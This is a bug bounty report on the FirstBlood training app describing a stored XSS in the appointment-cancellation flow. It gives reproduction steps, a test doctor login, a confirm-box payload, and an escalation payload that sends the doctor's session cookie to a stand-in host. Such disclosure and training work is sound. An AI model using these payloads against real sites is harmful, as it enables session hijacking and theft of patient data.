FirstBlood-#807 Stored XSS on /drpanel/index.php by cancelling an appointment
This issue was discovered on FirstBlood v2



On 2021-10-28, 0xblackbird Level 5 reported:

Hello! I can see that the previously reported stored XSS is still not fixed. An unauthorized user can escalate his privileges by taking over a doctor account and get access to sensitive data of all registered patients.

Steps to reproduce:

  • First of all, we need to make an appointment in order to cancel one. To do so, navigate to /book-appointment.php, fill in the required fields and click on Book Appointment.

  • Next, copy the UUID and head over to /yourappointments.php. Paste in the UUID in the Appointment ID field and click on Retrieve Appointment.

  • Now click on Cancel and make sure you intercept this request using a proxy interceptor. After that, you'll have to manually append the following POST parameter to the request + the payload: &message="><x/contenteditable/autofocus/onfocusin="confirm%601%60">. Forward the request.

  • We can't see the reflection now because we have to log in as a doctor. Luckily, we have a test account that we can also make good use of. Navigate to /login.php?goto=/drpanel/cancelled.php and use the following credentials: testdoctor:test. You'll get redirected to the page where all the cancelled appointments appear. You'll normally now see a confirm box pop up.

Escalation:

  • A real attacker doesn't want to display a confirm box and leave. As I described above, he will go for the most impact. In this case, he can steal the doctor's session (by stealing his/her cookies). To do so, we can easily craft a new payload that will redirect the doctor (with his cookies) to a domain controlled by the attacker: "><x/contenteditable/autofocus/onfocusin="document.location.href='//example.com/?cookie='%2Bdocument.cookie">

  • Repeat the previous steps, now only change the previous payload with the one above. You don't have to create and cancel a new appointment, you can just modify the message in the previously cancelled appointment by just re-sending the request.

  • Log in as the doctor again and navigate to /drpanel/cancelled.php; you'll get redirected to example.com with the session cookie as the value of the cookie parameter.

Thanks!

Kind regards,
0xblackbird

P2 High

Endpoint: /api/ma.php

Parameter: message

Payload: "><x/contenteditable/autofocus/onfocusin="confirm`1`">


FirstBlood ID: 22
Vulnerability Type: Stored XSS

Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues: the vulnerability is now reachable when creating and editing an appointment, not just when cancelling it. Making use of htmlentities() and relying on .value() in JavaScript to encode certain characters does not prevent XSS in every output context. The 'fix' to this issue also results in cancelled appointments being vulnerable against admins as well.